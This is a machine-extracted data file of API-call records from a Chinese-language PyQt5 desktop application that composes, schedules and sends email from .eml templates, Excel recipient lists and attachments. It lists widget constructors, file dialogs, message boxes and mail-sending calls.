'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (5393, 5395), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5430, 5441), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (5439, 5441), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5478, 5495), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"瀏覽\"\"\"'], {}), \"('瀏覽')\\n\", (5489, 5495), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5625, 5636), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (5634, 5636), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5667, 5684), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"瀏覽\"\"\"'], {}), \"('瀏覽')\\n\", (5678, 5684), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5984, 5999), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['\"\"\"使用\"\"\"'], {}), \"('使用')\\n\", (5993, 5999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6034, 6051), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"執行\"\"\"'], {}), \"('執行')\\n\", (6045, 6051), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6166, 6177), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6175, 6177), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6206, 6217), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6215, 6217), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6246, 6257), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6255, 6257), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6290, 6301), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6299, 6301), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6329, 6344), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['\"\"\"使用\"\"\"'], {}), \"('使用')\\n\", (6338, 6344), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6373, 6384), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6382, 6384), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6414, 6431), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"儲存\"\"\"'], {}), \"('儲存')\\n\", (6425, 6431), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6544, 6561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"測試\"\"\"'], {}), \"('測試')\\n\", (6555, 6561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6670, 6681), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6679, 6681), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6708, 6719), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6717, 6719), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6746, 6757), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6755, 6757), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6788, 6799), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6797, 6799), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6830, 6841), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6839, 6841), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6870, 6881), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (6879, 6881), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((6969, 6986), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"儲存\"\"\"'], {}), \"('儲存')\\n\", (6980, 6986), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7124, 7135), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (7133, 7135), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7171, 7182), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (7180, 7182), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7212, 7226), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['\"\"\"是\"\"\"'], {}), \"('是')\\n\", (7221, 7226), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7256, 7267), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (7265, 7267), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7298, 7315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"瀏覽\"\"\"'], {}), \"('瀏覽')\\n\", (7309, 7315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7436, 7447), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (7445, 7447), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7473, 7485), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ([], {}), '()\\n', (7483, 7485), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7618, 7627), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\\n', (7625, 7627), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7654, 7663), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\\n', (7661, 7663), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7793, 7806), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\\n', (7804, 7806), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((7836, 7849), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\\n', (7847, 7849), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8065, 8076), 'PyQt5.QtWidgets.QTextEdit', 'QTextEdit', ([], {}), '()\\n', (8074, 8076), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8104, 8120), 'PyQt5.QtWebEngineWidgets.QWebEngineView', 'QWebEngineView', ([], {}), '()\\n', (8118, 8120), False, 'from PyQt5.QtWebEngineWidgets import QWebEngineView\\n'), ((8275, 8292), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"清除\"\"\"'], {}), \"('清除')\\n\", (8286, 8292), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8390, 8407), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"讀取\"\"\"'], {}), \"('讀取')\\n\", (8401, 8407), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8503, 8520), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"儲存\"\"\"'], {}), \"('儲存')\\n\", (8514, 8520), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8629, 8643), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\\n', (8641, 8643), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8732, 8743), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\\n', (8741, 8743), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8772, 8783), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (8781, 8783), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((8868, 8885), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"執行\"\"\"'], {}), \"('執行')\\n\", (8879, 8885), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((15450, 15518), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '\"\"\"選取檔案\"\"\"', '\"\"\"./\"\"\"', '\"\"\"Eml Files (*.eml)\"\"\"'], {}), \"(self, '選取檔案', './', 'Eml Files (*.eml)')\\n\", (15477, 15518), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((15605, 15676), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '\"\"\"選取檔案\"\"\"', '\"\"\"./\"\"\"', '\"\"\"Excel Files (*.xlsx)\"\"\"'], {}), \"(self, '選取檔案', './', 'Excel Files (*.xlsx)')\\n\", (15632, 15676), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((15762, 15838), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '\"\"\"選取檔案\"\"\"', '\"\"\"./\"\"\"', '\"\"\"Word Files (*.doc *.docx)\"\"\"'], {}), \"(self, '選取檔案', './', 'Word Files (*.doc *.docx)')\\n\", (15789, 15838), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((15925, 16011), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '\"\"\"選取檔案\"\"\"', '\"\"\"./\"\"\"', '\"\"\"Annex Files (*.jpg *.png *.zip)\"\"\"'], {}), \"(self, '選取檔案', './',\\n 'Annex Files (*.jpg *.png *.zip)')\\n\", (15952, 16011), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((18931, 18999), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '\"\"\"選取檔案\"\"\"', '\"\"\"./\"\"\"', '\"\"\"Eml Files (*.eml)\"\"\"'], {}), \"(self, '選取檔案', './', 'Eml Files (*.eml)')\\n\", (18958, 18999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((19081, 19102), 'mylibrary.genmail.get_msg', 'gm.get_msg', (['file_name'], {}), '(file_name)\\n', (19091, 19102), True, 'import mylibrary.genmail as gm\\n'), ((22664, 22687), 'PyQt5.QtWidgets.QApplication.instance', 'QApplication.instance', ([], {}), '()\\n', (22685, 22687), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((1069, 1103), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\\n', (1101, 1103), False, 'import qdarkstyle, sys\\n'), ((1141, 1154), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['\"\"\"收件人\"\"\"'], {}), \"('收件人')\\n\", (1147, 1154), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((2107, 2141), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\\n', (2139, 2141), False, 'import qdarkstyle, sys\\n'), ((5815, 5842), 'PyQt5.QtCore.QDateTime.currentDateTime', 'QDateTime.currentDateTime', ([], {}), '()\\n', (5840, 5842), False, 'from PyQt5.QtCore import Qt, QDateTime\\n'), ((11920, 11933), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\\n', (11926, 11933), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((12968, 12982), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['\"\"\"查詢 :\"\"\"'], {}), \"('查詢 :')\\n\", (12974, 12982), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((13447, 13471), 'copy.deepcopy', 'deepcopy', (['self.data_logs'], {}), '(self.data_logs)\\n', (13455, 13471), False, 'from copy import deepcopy\\n'), ((15075, 15141), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"儲存成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '儲存成功!', QMessageBox.Ok)\\n\", (15098, 15141), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((17899, 17969), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"請確認有無 SMTP 資料!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)\\n\", (17918, 17969), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((19891, 19963), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '\"\"\"另存為...\"\"\"', '\"\"\"./\"\"\"', '\"\"\"Excel Files (*.eml)\"\"\"'], {}), \"(self, '另存為...', './', 'Excel Files (*.eml)')\\n\", (19918, 19963), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((20123, 20189), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"儲存成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '儲存成功!', QMessageBox.Ok)\\n\", (20146, 20189), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((22463, 22528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"缺少資料\"\"\"', '\"\"\"請確認是否有資料可以下載\"\"\"', 'QMessageBox.Ok'], {}), \"(self, '缺少資料', '請確認是否有資料可以下載', QMessageBox.Ok)\\n\", (22482, 22528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((9197, 9210), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\\n', (9203, 9210), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((10310, 10323), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\\n', (10316, 10323), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((11182, 11195), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\\n', (11188, 11195), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((13358, 13368), 'server.database.Database', 'Database', ([], {}), '()\\n', (13366, 13368), False, 'from server.database import Database\\n'), ((14464, 14528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"資料庫連結失敗!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)\\n\", (14483, 14528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((15172, 15233), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"儲存失敗!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\\n\", (15191, 15233), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((16755, 16763), 'server.client.Client', 'Client', ([], {}), '()\\n', (16761, 16763), False, 'from server.client import Client\\n'), ((16933, 17001), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"排程設定成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '排程設定成功!', QMessageBox.Ok)\\n\", (16956, 17001), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((17326, 17426), 'GenAndSendMail.insert_send_mail', 'insert_send_mail', (['eml_type', 'eml_file', 'user_group', 'mail_excel', 'sm', 'db'], {'annex': 'annex_file', 'url': 'url'}), '(eml_type, eml_file, user_group, mail_excel, sm, db, annex=\\n annex_file, url=url)\\n', (17342, 17426), False, 'from GenAndSendMail import insert_send_mail\\n'), ((17519, 17587), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"信件寄出成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\\n\", (17542, 17587), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((17616, 17679), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"信件寄出失敗!\"\"\"', 'QMessageBox.Ok'], 